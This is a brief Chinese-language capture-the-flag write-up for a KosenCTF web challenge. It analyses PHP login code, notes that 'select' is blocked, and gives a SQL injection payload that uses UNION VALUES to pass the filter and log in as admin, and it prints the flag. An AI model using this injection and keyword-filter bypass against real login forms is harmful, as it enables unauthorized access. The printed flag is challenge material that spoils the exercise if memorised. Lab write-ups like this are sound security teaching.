可以先分析源代码：

<?php if ($user) { ?>
开始一个PHP代码块，如果变量$user存在（表示用户已登录），则执行下面的内容。

<?php if ($is_admin) { ?>
<div> <?= include("../flag.php"); ?></div>

如果变量$is_admin存在且为真（表示用户具有管理员权限），则执行下面的内容。
将../flag.php文件的内容包含在一个区域中并显示出来

而且php代码中提示

throw new Exception("only select is a forbidden word");

所以select 无法使用

构造payload

username=1&password=1' UNION VALUES ('1', true) --

即可成功获取flag

KosenCTF{d0_y0u_kn0w_that_the_w0rd_va1u35_can_b3_aft3r_un10n}